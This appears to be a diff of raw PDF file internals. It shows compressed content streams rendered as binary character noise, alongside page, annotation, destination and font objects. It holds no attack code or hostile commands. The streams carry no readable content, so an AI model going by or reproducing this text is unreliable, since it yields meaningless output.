-xÚµXmoÚHþί°ª‹€4l¼~'RzGÀI¨€´ØôZ¥rð&XÅÆñš$üû›õ®CLèµj¤Èû2;;ó̳³³ÈÒ½$Kµ‡†¯,aÉT$³-#ÜnK³°v}#K>Œ”d¤µ-é)“ -%ͰໜÚçÚ™[;>W°ÔFmC1$÷ŽëPQ[Õ%×—®:j¶¬¶Ö˜Pïž4oÜÇçX/Ékº…d fÒ†ÊDj²0 t’²†Æd[šª"¬ªRK×Q[Søú°øÐléŠÞ¸v;g¬¥5 qÃ4I2eCja\P¹ü ?ì»Ùd«bö»¬ËŽ=°».×IW1I¦q7’à‘¯†¼®as´¢$áý/í±Í-`ƒ§™²É™ãŽû£‹iÔ³¿²¡îd<¶GîtâØcÖ‡ q%õꢅÙD6ɬ•«ÜÈää²<(:­«W-éŒz\ðjÜcûû=±½|@a[.Tø¯lȺòé*ýÝŽã -e™TÇáXt/;™ŸX†¿JŸ4¡àj2v¹]‰]…\¯è8ö[2ýóÑd0àûåàs‹ë;Q·GîåÛ&–"SÀxðVb¶ƒ×Р± -ˆ¢=æÒgßÄ*ÊuœnÕfebçA:Ë -BPã{VfhùVÀùÑ˸@%ë»ÅŒ°lf ÒŠ±QoŽå=gËÅ*Œ¦¬÷Br´1˜®c²}2ƒèn™€pè¥Á2šÒÙœ„ê^ &ѳuXõFêÝ‚ì‚L#P~Z? uA`80†8Èr\zõ÷‰¥„pÀ¶ŒÜ´Ñzúi Öô¿ôö…íü¤nÁ–²T° ÷d7*!ðbÏÊ µ×òUy(ª·ØÐït/Y؇p"÷9“# òléQy4ÚµÛ«0ÃÉìŽeè5Ò§eâ¿‘ß«” lûSFz…¿Øc§5z+ }ǪFßg9ƒ7™ð5kú7ï³d Mp‘²ÆQ&s¸-S¥øå^tìëâBÜ -lY(ƒæõ ÝR4Ô–MøZÈT-q•@öÐT«±n*Vc¹bvƒ…Í‹x›2º3‰t.nÓ‚ÄtÆ;w«hÆBæ-‚”©X‹Uó%ë=Ñ­µ+’DŒú们jñ…*`À¦ô­7k*fãG‹DBÆ÷€Có¡A1’ˆí•°¨ÈPÚ–5MIØl©ª -c_Az1û:ðFaë0³ì$²Îí*åë -ˆØèÌ‹x#Y µOs/%L†³ j¥„¾bªHÇV^ 팒ª!£­çb4¥…ƒÙ†kInÆ›ðø4âµ*[HÁP[a³ip=ö³Æ Â-ïø×l’€þàö“çØ‹(„R‰¯'|)׆X7‘f)¹‘õó™Áh©P%ÊÈ0+Ü2u„-#_‘zÉ=IO6jÄ]ßíÚQ‘Md&2dAÿ¿8÷ãu:g†gé HœEÅk>ÒZñï»yšÆ'ÇÇØT6XˆU[*>æÔ8ÎÒÅ1X8 ¢ÅóøïÀ?Åï„mÁ|‹ÎÉb!nLv´úm¤aeóø¶Dµ©ðð v-œk„ÐMÕÉ¿žÏOÂðD“oD]ܱ[þJtgÞbD÷¼#‚yÎ C¢€^ò±‡œOž„‹û¤þ,®Çe"ª¥1àE"…Æ ¡4¿à]¨Röä§<+kÃ휚f)˜¾åªUíêIgóÂ×ÂÓò†ì‹@/Wi¼zq/ËwÅáöÕýbU½*­î1k½”òX´Lsä–/J…,£e~dáÓüÎ+”$%¢ÈR¬ýäDKH -iêL -™æ -8yE%L‚ûV”“AJÉâýv¸záÇ]NŸìz  Hy8„!/É;#ƒ¾þÛ¦D«ð6¶±ÄÆTW™§ï0O«4Oÿ?æõì30orq“5ˆâÉ6AõÒ+¥ÛyþÄ*^Jya Áz©¼;¢Ä-^°®üö:ÚœV•·šUµèû™¢:«ÚXyFN S°y„±~„e _µKvÿD½]ö BèÃÆ®wÒ^ˆ³A|½ú+Á‹I°!â8cõ%¦AqŠ¢—%³eäÓ?N•Cv°ã5´*j¼äå -‹+Ê~0`5ʼ`áü³ÔÈôTýlò Éd›4_Y”Øní?h…ó’ -endstream -endobj -843 0 obj << -/Type /Page -/Contents 844 0 R -/Resources 842 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 837 0 R ->> endobj -845 0 obj << -/D [843 0 R /XYZ 72 793.935 null] ->> endobj -842 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F26 513 0 R /F22 421 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -848 0 obj << -/Length 928 -/Filter /FlateDecode ->> -stream -xÚíXkOâ@ýί˜d¿`‚µÓN+5ÙDð„•G6†5¦¶S™¤ìCã¿ß™Î”G-Ȳu£$dî0wî=½çÜ *ƒ ƒ³ÊcÒU*àÐ%hÀò*ã[ØôóK KȨƒçÔËH¯ÓÕƒÊuådX9h+’¡+::<†*ª†6W5io¿n ê(2ðÞíðò  µ¤Õ%Ñ€©·Ž˜KEÐhlÔ©¯Ž˜ï>RU ª*3$„ ~g<™yÞªßîíkŠVŸ¶Nö`ut&öS:Aèa›o™¯  ŽØU‰Ï?g¶ߎŠc*´êfÙXØ—#nZVsÈí‹vwÔéü’5¹Ù þƒ!3­ÀM<ÿÎ7=̽¾6Ï}æeú¢dïÇš©JvÀï´û½«"ÄÄgoÆ$ðï"k‚=S¢š½Îèª+Òý -·©jŽCTß—~–¼ÇN Œ¦~ŒCÖÆ9WrˆVpˆ¶âðÞ%Q„ã¸uewXÜù1 -KìC¥ò>çE»@Ÿã&Žóò5Fÿõ-“ÃûÄ÷K¡nG!úŒ3T)‘@õk†6þ'}³ÎgkkXù _&E -endstream -endobj -847 0 obj << -/Type /Page -/Contents 848 0 R -/Resources 846 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 837 0 R ->> endobj -849 0 obj << -/D [847 0 R /XYZ 72 793.935 null] ->> endobj -846 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F26 513 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -852 0 obj << -/Length 1961 -/Filter /FlateDecode ->> -stream -xÚÕX{oãFÿ?ŸB( -Ø)¢‰ÞîŠd×iSd“4q -ipP¤±­‹-iõجûéK)ùśۻwŒ™¡8äo8r8†6Ó í‡ƒ&´†fj¾¥ù¡!Ì0ÔâåÁýƒ¡%@ÿI3„Ú³âZjŽ@»Ðn~>8ŸY¦ŠÐ³-—##|8Ô]ËÞŸ_žšÃ+–².SùI&#?7¨Äë¦ë²_ò~| -Bî~àq!Ëi^.eBCË öc#Ax…g˜fDäo•Œó,©¾FŠ]1ÞÛñÅøÝ„úçg—w¿®ñîøo'Ø­š2‹–’8Nn©}÷ãÉ ~4 øAÇÄÿál¿ÙVûæœÝ\}èC[˪M%ËŠø®nÞAû N¥6MZï¨sqþá|B­#"™o2Æþý[¦ÙlÓxÛÚ䃛»ò›mTƒ]›ÝÛ£-9£þŽá™l¢ESƒœ¹,yü¸H«JÖuï’ÛÉ­}§‹&O§«vr“e«½3í£öT°s´æÝ9¦ºåˆÐð¡ „oóÉ;ÅÙ¾5\ZÁ0ohGu*)±xÊ|I¤z.©#?GËb!A§˜Ãtºþ¬T[Ö†j30„emˆ`Ë¿„h»Âð;¶ªŽj¹”B«IüqɘgJííÏØq^l"òô’ºõ÷ø‹o -Ãó¿ì/ŽðÂ.óä XâfN³,È:çõ¡ ^QÕ³RÐÀÂnȦŽãµ3먜Éz´•â^kwSŸIÕºå Ïàcü-‡¶U=Ï9tU°íÊ×D±"ŠÞPûͼ®‹Ññ±éÃrM^2áã€:Q ¹(eÅa}|9ßô-,õÝü ™÷êîRål<Í;‰Wõ(c¼žÝ\¿õSYÇónùݺ7u·g©Þ¸bP7oꢩ9½nAîFr{d˜R ÞûúnÒí»­ -H[Ø;€<ÿ”&mænÓº t¡ ù`q–¾g]¿g¬&Û‡-ì7éî½ÃùÒ5`m)Ì{öZ„å3èsôµëœ_ÞŽoxûÎ/'W›>¢º¨-M8…S -¢½¦+áÁ/'wãÛõ$—ç 07(S¨1(_™Å%ümñl·ßxxýéÜæõ×DO6jJÒ²PTç_eKy±, ®—ƒç¹Ì¨Ç•}ˆ• ÍÕèê`ãÄÀÀ"ŸÛ ø°B>8ÈG}k}lZo©ÉM:'åÒv{'€Â€TaËŽÔ¢r ™°\b¹\X_«Ç—¶Þ-Í4E躆€fã³{’ ¹ Áô•žHÜÏŒŒ°Ébö+_Äþ%iø²,Æ{«+ wb…‰‚pxŽ¦©`µ—@¬mªZ½Á>7»zÖê­hˆiàîý™J/[«šß® -5sÔ*S¸nWëz“Lu\ŒëÑž'Œîñ€ß6v_Ba¯t(‰áä&ú"E¡½åýxrð=•» -endstream -endobj -851 0 obj << -/Type /Page -/Contents 852 0 R -/Resources 850 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 837 0 R ->> endobj -853 0 obj << -/D [851 0 R /XYZ 72 793.935 null] ->> endobj -274 0 obj << -/D [851 0 R /XYZ 72 142.918 null] ->> endobj -278 0 obj << -/D [851 0 R /XYZ 72 115.051 null] ->> endobj -850 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F26 513 0 R /F22 421 0 R /F24 512 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -857 0 obj << -/Length 2234 -/Filter /FlateDecode ->> -stream -xÚµkÛÈí»…Xˆd½ ´A®¹¤9ä®›dƒàà,‚±<¶ÔÈ’VÙë_r8#Ù^ms—C?Í‹äð5’Ž±5ãÍì~æÂè®{Fœ:¶›¦F¶›-ïc û¿Ž¤‰qP;#ˆKããìýì§ÛÙâµç©F^dÜnˆ†o§~hÜ®¥Ús+IóSǶ|~wûËⵞÀab;”ÐQ„ 3G±fXêØ -|;Rú}žøfÝÏ-/rÍŒU8ñÌ¢úÏÍs/ˆ–@ê¹›‡Š}Ç[kÍ¿8~Pñ5oú*E]u´üâ„ΧW¯çI`ÂŽ‹k—WH÷HPY½kŠ²¨¶´dñëñãûw´S·4ÞHf:±m¹:sÍ.GÂlîš-N8L/e±jY{DŸ£.@–ëÛ‘—ð¯Þ ?¦‘¾úæç¢Z×xÇ¡£V­iÒå¬åk‚ªWs+ MÒÑþ»¢Bìþañ©*žãflŠœW×´’øù,ONhÝ}¹c Á -‘Ó ðè¸azë󖟜ʧŒ«å·´i‡£Kfu«ô„Ge úJÀüe©€ëŠ€hni|\íX†ìçEÅÑ}g`qEY Œ{¬ûFåE´èê§Ù}Ï;é- ª õ;AîJ`­fŠ9)§Äú¾œ^’HÖq”x8Y3ÁV¬S+pÙ=òÂ[Z£ó–úìØ ¾V¼46³–3!â‘Ö#‡=íñèêòoÜnëÍ -A#ø’¢½æÔ8¯Öäôp‡æ{Pù„ u£•åû©ÉxÖ#‹¾/ÅÝQð·Ï¹~)’¸ˆMÖ* )DÑåÒ«}”Mò¢ˆ0 !2x«ºðZ?¡Ð!É—]M[-ß)o‡Û=ä’N¥z&DTWû'fý0?ÐŽd¸‰ÇáþüÀvM©0êŠFFò,°FÓHÊ›¹ïdLì`"ÀÆ‰í¹±Æ»>‹¯Opud$@" -„庑8‘ay±Æ‘ú/4›£È‘oœw`?©`»9ÒŽÕÓ˜ Ñ\/nìÙ@Ëí¹ë» 2È¢ÙÂd±åâkQ ÄnòæE±þ»‹èiYýzcé/ ïit´R½ÀN¥Ô¥mÛwƒ¶=PœO¾"4Ö4e‘1pMr9Ü<Ë«º¬·ÇkÚ¸ù× MBÛ³£çÄʈehoÜ÷`?=»GéfŲoÇ8Œ`¯~úõã5aߌ6›àûYN8ú$SÀŸ¾®¬!Ü)­ËðŠ³z£ *¢¾Ä (ó‚V ÃEC t÷@·\Àÿqô ³Õ×á¬ȯYlxZÌëܱJÙ¹rg6E¥o?ùWq ¿”¨såV)ƒ -uªc˜$ ã -%´ž–Î4xÎÄ…Bó99¯ØŽOj1”qƒ`ÙÝ -c¯¼EÝÚùÊ÷`Ž?¦ü9«¦Úz-Ü,x«ybßxwvo`^é®Ô«A½¬/…òOWFî?-5F)K› Ñ‹Sþ03!•&TpÉX‰?ˆG<§Á-èb­zª –ž?©—I6”jF'=_:!+Ë®ÕúÑÿ -ŠÚÏÛ+p×T<._T‹û;ErÚdÃÓ\`Š× F_LÑ[ºwßwÔ¥fé}þÀ?~øiI =aLíþ”þ>r¯³j¯¸ð/¥Uˆ×µ¶x'¦œîYœ«-øžOø\;~ÿK"0Ù b-=ùõHj§¤@&ÏISó -™¿šúþ¬¯Š\[¢VºÄw\ÕÀæ„\‡Šk)@õ㯳§ýeüTq  ÇPö¤’–®wí8×®£ürùù% ~øííooî†;øè+bðÁáÑœ~õjL6E©clÇöúëÌe°$‚ GpõýÈTQR¬ÊÉç»ÒqŒ—|ˆþ{YŸ<ÎʤFÈ]¢ñ¼Êwâ“Ô\0Y¡ Ìa]ïüœ’X -LÏ!iÍŠÍ‘v(-˜¡„Í¡îÀƒ±ˆ¢C]XH$%>î«bv÷£-(whÓj [)DÊÉ)õN+}Ò¨ÐÕ™¨e[VY`ê¿šR’F™((luC`¸®†¡‡`ßn=¤@Ù«¼–FõãѨ8gYÆ»n"ÕÆg;é@²U ¤æŽ5žŸXðcÒ=¨ æ”®àŒTŸœUX…`!‰;o¯ºKô@ò†t7¡Š –þ-up=¡e?MÅ£’!›Z[àÔT^MèX!œ%oáÍžKõ7ŒTùÕ]W¬YÜÂ7£Š²> endobj -854 0 obj << +832 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[0 1 1] -/Rect [286.536 127.048 534.93 137.839] -/Subtype/Link/A<> +/Rect [286.536 426.249 534.93 437.039] +/Subtype/Link/A<> >> endobj -858 0 obj << -/D [856 0 R /XYZ 72 793.935 null] +836 0 obj << +/D [834 0 R /XYZ 71 806.89 null] >> endobj -282 0 obj << -/D [856 0 R /XYZ 72 277.949 null] +354 0 obj << +/D [834 0 R /XYZ 72 710.049 null] >> endobj -286 0 obj << -/D [856 0 R /XYZ 72 250.081 null] +358 0 obj << +/D [834 0 R /XYZ 72 682.236 null] +>> endobj +833 0 obj << +/Font << /F21 503 0 R /F15 499 0 R /F26 632 0 R /F24 614 0 R /F22 546 0 R /F11 664 0 R >> +/ProcSet [ /PDF /Text ] +>> endobj +843 0 obj << +/Length 3112 +/Filter /FlateDecode +>> +stream +xÚµYYÛ8~ï_a 5©EÝ +°XÌ$=rÍvgç!²MÛÚÑ5:úø÷[eÉ­Ü»/6Y,Yd±ê«’»Ú¯ÜÕOg)øwWj{«8u•¦«Myööwµú¯+× ÒduK\å*ˆø/VWg¿ýp}vñ£§V©“F^´ºÞ± ßIýpu½]½µBçÜNÒÀzÓe{}þÇõ¯?ªp„‰ã ¸ýYÎ\ÙÚÊ–a;ð H™é÷ƒnõ9«ë³Í¹—XâÞ2ñ¯A·¹î¸sȨá[UÝ3e}n#³®¸›o¡„>çú‘QŸ+Kúƒ,vK‹¬¹“5M‘o²>¯+–ÿÎ Ýs[Yf:{Ð:"ëõϯE^Ëÿß_½föÛ¼?È~D[W[Ô4·•ïD^Âên³>[gn"ð¬2«à KÙ3Óºû®×%¶}Ò.¶t^íyìÅýÕoÏaoŠ»Yµe>Ö +(Ï~xqÅ­¼›Ly,´~>ÖõyQp³¡s¬»._"«¯e•õÀûåuèÖ=orëFE¹Ñ«Ëç—O¯¬Ã'Æ:6Eru ýÐ #eyyýêܽÐzõæúÇ_ž_.ˆŽ`F蛸s/QÖ¦ÕY¯± Z0i¼v¤™ËÚÖ¬}ËxOòê>zïsÅëv<ÀUq§×¶?uÞ>ùjQÚ¬ŠLg]&NyÜ0ìðÅ“lR8á„ah!1¼nz00\dÕ~ÁÝ“Y@L| +œ4€èæNbÜý;Wŧs¦~ [£ÛÂpòù63Ûžë€Æ_)?ñ-çååõg¯~Å:¿þŸõÀ8ÌAcŠUðÜS7^Ù¾ CÀFçI© µ^ ½]ïì5ÛEB€ƒ<Ón(˜°©«JoÀo"`xAG)ë…îuÛ´ø‹L¾õwæݵ9»Ìn!µ{àÒ]!R°K: xAàDF;Û®;»«_€WÊIüñ/Š7™KêÊ5º 0êì~)pÆN§ŸÏD®Áµ}`sÞHjÚüÆÖÝfAVèA8T_ «ìvv“[:‘ee ËN¤©Ôñ£‰¸¾l>$Ü]ìÀÛ*qâ8ˆBa8$`åGÁ)šÂ!rÍ0^ ÀDÞ˜œU ¦¬¼˜lGöSOí6P)Û--ö®Ÿ¾æÆh½b=Ñ£P ?‡ß[üa˜ œŒ¡‘õˆ¹aèOo™Z2 °|"š¹p~FžñžÐ8‚[ìQüf©QÁëÂñZ† +[qOqSÍ'¨!ÀŽ4Œ dô)îš!o¢·ƒ=ÆÚˆ’ ôz 5¼¹™ºÀøhÕ^Z¯QØéì[ ctðï¨tŒÓye—º¬ ÄÃf§¹Zßÿ½£öÇÛ4æWF÷lÛ¥ºŒ +rÇÝä˜É¤îÑp’ô¶qÏÞj|÷{”ÔÚá9Ãë?Çd‘ü$¸+ÇOOÂíüaˆ—ÄãÀë¾_Cx¹Éšàû Çñ)€"W{5Éþ8'ð-óšÈ7Ï}4†ãÑ9#Ÿ-g7B³¥MÃ+Kâð‹¡™óQü뇩£¼oAÀo$¿ \Q»Á.Ú óßÌj Gœ8a2gaT[;+ê +B¾)ÃP~/ËFI"»Ú«7dk¸ck´7ckØ9±5²,_ÅNœX– =K£ÔÁÖĺð4>bVaäxÇ d;i8ÚNŠí¤áCÛI9°ã?*·€&©Ì9ÂÉ»æý¦Ü’[ý„­ÇÊIUð`SGô€ÝqWÓÚ ôåQúx$Ê?I·?få¾ëÄQô?6òÄsÂÈû†,òrbΘspêý2z?‰V\8…Î=·MX…l¿”J*¾Š‡oÀóc€}£¯¹zñd€n +!l34È:Tî6/<°]O™•’Yi,Ë·{©Ïÿë§3}qå&¶%óJù[Ú£)ôŽõe³ot!8¦„úæåS¬.¦¥. ´ [Ç€×3yȇ[‚Ý)Dò¬Z‰l5s1{lÒ.ÑÇó(ë£_d-3}•L‘2ÕlÕ YzÊÛù£ÿ€üõ=`šÅäÕ6¼s[Ÿh¸°Í;>‹e:€ûϲ¯Ó8‚·ƒ'*žßUÅv£Nd¤šÕù^ZSô¬ÆNuÅ/!GSòí?Ü¥ð9*'¥xvõ‘õ<§Œf¸»xSåwb!Qê„aAkl]“¨KÔ%ÆƉ¿B:õW@ýÕÑ^Ñäú(«[éh “ØD ÇjÌrï•m¦ÍŠçº..© †PH +®(†g–ŽçÝ5ð"›â¶Í¹¶ß×7Y hn V¸+â ¬¨[-KauëFoúèb½9klÇõ@Àÿù¹ÅÍ9òÕÜür$)¢äâ&댽‡Y'ÐøYŒyZŸá)”¿?$Ò¬ƒpÜbí„› %i±<çE;&>vÏ7ç!âב̈1Æ›ÿ1(†Vªùÿ´Ø†¬Ý=}‡¡ÒöáØ æÞԜڷu1îRyÐ÷Y1 5ã%¼–‚¾ªQ6¯R|X5ຼk@¢|’ ŽlºãG#©œ»ŠâF¤þG߃p‡’fÓ¶“D~æ`l^‰ tÍ°H"¡sŸåU×OJH³0Øÿ¼ñ¡°Þh•€QF¹9ùàæ—z¼ôßøKys߬zøÙÍ <”ÓÜ3Åøÿ»Cß7O..D`%Žò#x•—\°O»(ï¡q|ŸWý{ðxðæïþ 0E}‡"ëòÉ=Â[A c+Ï Rÿ$“àEoø_ñÄIÍžÈ} ËÍ€!~)"¡¨h"ïë­ã8Œ‡>YíúÕ³W‹§xy}ö_Ü ‹ +endstream +endobj +842 0 obj << +/Type /Page +/Contents 843 0 R +/Resources 841 0 R +/MediaBox [0 0 595.276 841.89] +/Parent 816 0 R +/Annots [ 837 0 R 838 0 R 845 0 R 839 0 R 840 0 R ] +>> endobj +837 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [454.655 312.776 499.532 324.729] +/Subtype/Link/A<> +>> endobj +838 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [511.06 238.226 540.996 250.179] +/Subtype/Link/A<> +>> endobj +845 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [95.91 224.597 112.843 236.55] +/Subtype/Link/A<> +>> endobj +839 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [289.772 174.275 540.996 185.066] +/Subtype/Link/A<> +>> endobj +840 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [164.574 160.646 462.468 171.437] +/Subtype/Link/A<> +>> endobj +844 0 obj << +/D [842 0 R /XYZ 71 806.89 null] +>> endobj +362 0 obj << +/D [842 0 R /XYZ 72 570.518 null] +>> endobj +841 0 obj << +/Font << /F21 503 0 R /F15 499 0 R /F22 546 0 R /F14 615 0 R /F26 632 0 R >> +/ProcSet [ /PDF /Text ] +>> endobj +850 0 obj << +/Length 2096 +/Filter /FlateDecode +>> +stream +xÚÍXmoã6þî_!TÖŒø¦—‹CºÍn·Mš6vô¶ÅB±[ˆlk%9Yÿû›áP²ìUš¤(÷!15$‡3ϼ’·ðïÝèÓˆÃoàq/^”Œ'‰7_>üxÐð¦’Ø{°«Vž +cø-¼éè—Ñ·³ÑÉ[Á½„%¡½Ù-ñ,‘Ú›eÞ_³ñ$N”ÿk.ÌøÏÙ'o¹î­W:f†vµŒpÉ(p¢y7=Q’)•Ð¢ow㉵Ÿ™Ût[4ø¡ü‹Ýô—s¢oÖô{¹cîg›±ˆý‡š–VÛuM+Òš$¢'$ $oEšþ>] H.9“‘n—½"ŽK: ÿ™{û¿¢‰ŸñcS7‹Êt‚¶‚(„¢Ÿ‚¸LÊ*¿Ï ³0-ÛÖÀîK‰…à, +;‰K:¦y¢DÈxy.Y(bÚ`K´? d³¤Ïë|Ýé:£Áy¾Fúö3WIá_Ðù¼ÚÔ›Û†VŽ80àù–TDA´ Z$CCáªÖ¨IPòˆ¥¤gåñß°p|XšÊ¤ŽýÅ—Òo"C¾/\ÎÿH%2­”Ê thú°I)Q˘F  V`Zµ¹%J³4n¯À`v8¨ªBСU᧳ÙõåÕ㉠ìÙÕoïß zgºÇàºÛØIWoVæ©3£„ŪÛz~ùæô¼âÐiaÄ’(i·0QIÍ Æ,Š"š{P+áçh%ý’|¯®ó›ÂÐT³¡ß²Ú ŸÜç™›¨?«´¤}¹uW\¾4ƒÑ,˜†¤äDšØ˜š˜z> ½V, +Âvi ¬çhç%Ô‰c%5Õí¦Z%uçöó`¬™Üçµ,mÒ›´Fù£Ä*4°™›ºßùš¨6¸Ý¼ {ç„TˆÅaÌ‚i‘69Äî€"’ÅA÷9¤•@˜š&­Ëb“7_Ú[C錷0M½«³âÏaØyÆ|³ZYÇÂ3–y ŽŸ¯çÅ63sNWLÉ šƒDcªÚM9ë¨U W’® |°Œïò¦JË ;,,§ÆЙëüÓÖÆÁñµR‡‘ûG ƒGOñ/¦<˜\Ÿ€;9s˜)ƒþZ „"û([]¹ã +B‘‹6}‚j˜>!ÿø•YäuSíè+[ó .pš‰ ÙŠ ¤ ˆã@Á)ôLüu,í2—¼#:½Óa)d¿µÛ¼t\nR âÝÄØ$”½×"°1”ð•±©ß å<¤' ôMŽv¥=X•13¿²V Íq\%‡â]Ñïï.)#¥[²Ï¿¯»¬Æu«ŒH+®°Sñ¹¡‰´,‹|Nc õ¶DH#8¹©©qPؽ1ϪrSÛŠû§E½±§'~ ˜»0ìtÞ@!þ³LkÊüÖV–€'n¦­kc2ãòt— +\¢n·w¦†qÞ°„Ž)˜ÑÞ1G×T‰eRä+l8d,|=o¯;œ2îã~Œ K±5á»Nÿi—B¿*ß!Jí33œ i6Ô·¸µ%ä×:ÇTBu4w`lʽÇZ€ÝY7ÛÒü¶;2ß¡×oHÔ½3=¾K¡õ‘Ø ;7Cû06ñ×]>g¨Šqräó¤&°"Ç£‰}ûÔ½®¤«²pÝ|w;Æ"_;”W1`²¬kÒ¶5ÝwIê°KZæý+Ãí¦pO…T^»[ëc¿€~èÅ€h¨¬ã*?‚’£@A*ü‹ÞxÊ]³DxqŒöÉ…•;¢L¶ô»lšò›“žÆØq(]°–‹ø„ÞhNÊ N¦ù˜¯–ÖåççÙkî¸ÀÚ.u[Ê\*‹kÂÇaŸßSÂ믾ÿñì÷ø  Î?^œ¾ùþýOg¸wzùvv}zeÇ$ÁWî(“dÅ×3ƒ/qû ô¸×Wgï>NÿÓ#£xèÍ ïÀÍïýpÿs÷ÿý5K»ûÿ;³6UZ w_ý. ÷tW³ÙåwK—ÿpoÚ ºÇÙlô_¾E +endstream +endobj +849 0 obj << +/Type /Page +/Contents 850 0 R +/Resources 848 0 R +/MediaBox [0 0 595.276 841.89] +/Parent 852 0 R +/Annots [ 846 0 R 847 0 R ] +>> endobj +846 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [455.773 687.614 494.59 698.695] +/Subtype/Link/A<> +>> endobj +847 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [74.877 673.708 119.754 685.661] +/Subtype/Link/A<> +>> endobj +851 0 obj << +/D [849 0 R /XYZ 71 806.89 null] +>> endobj +366 0 obj << +/D [849 0 R /XYZ 72 661.255 null] +>> endobj +370 0 obj << +/D [849 0 R /XYZ 72 574.844 null] +>> endobj +374 0 obj << +/D [849 0 R /XYZ 72 498.633 null] +>> endobj +378 0 obj << +/D [849 0 R /XYZ 72 422.422 null] +>> endobj +382 0 obj << +/D [849 0 R /XYZ 72 346.211 null] +>> endobj +386 0 obj << +/D [849 0 R /XYZ 72 140.612 null] +>> endobj +390 0 obj << +/D [849 0 R /XYZ 72 115.123 null] +>> endobj +848 0 obj << +/Font << /F21 503 0 R /F15 499 0 R /F22 546 0 R /F24 614 0 R /F26 632 0 R >> +/ProcSet [ /PDF /Text ] >> endobj 855 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F26 513 0 R /F22 421 0 R /F24 512 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -861 0 obj << -/Length 1604 +/Length 2118 /Filter /FlateDecode >> stream -xÚ½X[oÚH~çWøa¥€ŒïØH]‰èH°Ój›F•ƒðÖb’Hýñ{†™Á6J¡»‘ÈÌØgÎýœù<7ãî¦òRa8‘kJ\ÓxÑ0¸IPy|8žä^1tîuMpŠ¦ÃèsVå¾reW]Iä ÞÐ$³§„‡Ì²ÊÙ.÷XUùZ]7”êCâÌPíÉþØèŠjŽ^Qu^P€ášZkb’Š@UÞ§­¦`Úº"˼(Ë\]UyC‘ÈžGžçŸð6ØR%ÐU¦/æóV´Tù©VW%µúØvkbuD—é‘ɳ3ù^G¡KV×W·™y@œé]”¤³Y÷ƒ2A¯è™%(^¡Ï•j´@±“zጾzOR´È⳺ÑkB%AÉã(&#<ÑÊq ß›÷($:—}gl¶mó€g×IB2™ƒ‡'à`üXÍÊç\5úCËÛlnöiÁJZ­~jLêø¬-ÿBg8W¯|æÓ®D=ô¹g³çëN•£˜Ã»·­µRíŽG·4;²’S²gŽi` èã”é>èÿe²VFzS3ÿñ£;òÝ -ž¥®–¢ ×âf è£fÄhnqÐ k&¯¬ P­ÈA‘·uÞ<É… -YÄíÇ©3ÍE!Á^ôÃ]ú¤ÄÙjÐêþ,ÛŸ…SñýˆœÝI›`íÄGN¸a¾\léå:@œ:ÏNBN 8@azn{ŒQ­2³ò úè 9Êoî¹ÊqìgQv”DÌ Ç-8M©fíàÕKç{¾wB‹q'‰eøFq  ­Ñ±„Gyásc«aÈ}öB‡ˆPsê0]• Í¡ßBF… Å;>$ÓBŒK¡™7ÝÊ–ãGÐRÂÍÉ.±€É!z^Ò²b(Ê)ÝdØ«çû[J=c¥¶Jþ(?m!”N曀bUiæ\tZ ôæ öŸ¾¥ÿg2žÀþÀó{ŠœŸ5Ù}rýÈqwU.f^ÓíÔÛ¸”ù“6RVF»õJ}?CîþÞ>¤)Ü-bì4ßQǫ̀ä±Dþ«èÙ‡Qgô0´wqQù§ì+~í0Dö}“™UbÀ/&Ý'¬rÜ «ý–ö7ÅÃvF×& HÑÆ^†¨`s £ k/|ÝШJa‹Zˆâqß¼yA›ÒD(E«£n×b·'ÔÓƒþmß.‹­rR~|º™/&ïWø7ï÷Æ>> z÷³/Ÿ|¹ÿðá@@%é¸ì‘ØMTiþˆú± ´WÞŽöJ>!íezæ¡TìÛx'qV,.iB$Á0ªy †¾,½¤AØ7¢eºX¦ ±)ñ¢ÆK ¡ˆïIÅf–4:ß¾•5â’«¹ÌÐb&vñáΔÉN>?šÍAììÁ×NÙyE1È2t7 àûsˆ@ZTW#êþA³Éa×€°hwö—: ,öœ(6:ìb5oNÉýõZ/¡ £Î7eƒ°3‰´Z]–å5<Ä£CvnË5tÐØí÷úš–ÜÑʺLàìz‚âUM–ªØ‡x- ‚Šg -~v¯¼ "ë;LæLðÿï„V(ÑYɲÄĦN<ð+‰ÃˆG„a!Tãz†¯ÂѪ&5«ˆ³4Æ󯂬`Ô—¿Àg£iWþ®Ûk +xÚ­moÛ6ó{~…0<&³,R”,è3¤hÚuXŸ´÷aÈ‚‚–éX›,9’œÔÿ~w¼£,'nÖõëH÷þz·^è½9»;ð =áM¥7ÍÂ@d™—oήoBo û¿za ²Ô{°XO%)|KïêìÃÙËùÙäµ^d‰L¼ùŠhDAÅÞ|é]ûq0§™òoõ­Ý̼ñ_Åi* h±£QÎBfÍóñXER!Í/_]¥£—CoÉ@à‚q Gc!Tæ_™¶-êj4ŽÒÈÿ3ŒTif£q,„ßêQ$ý{ü3x¬|]- ¯1ínc^êN»Ý®) ]XžØðpÈÌ^=]>’©¿ž1Ïr€%T½ôãö½1ãŒEL§,ÜË=2“úK³Ò»²ÃÅÔoï@Z¿ÜŒ„¯·t^Ö·-Aº, Ë"íLSšq‡$rêwkS4Ö»n»cÊE5’S¿«i¥×|îvº¤é”ÎsxË©FN‡Òª0˜f‰·uFQaOà„ƒ€¤ÒÝù ±áV7Ë0³«ž$áá"H§)h- +ɶè Y¢*îvÀ«R©¿kS ¡tø©w¼‰ÊZ3.úxóÞ™¯‹–6Ýw×"ª¥®¬‚K>¦ 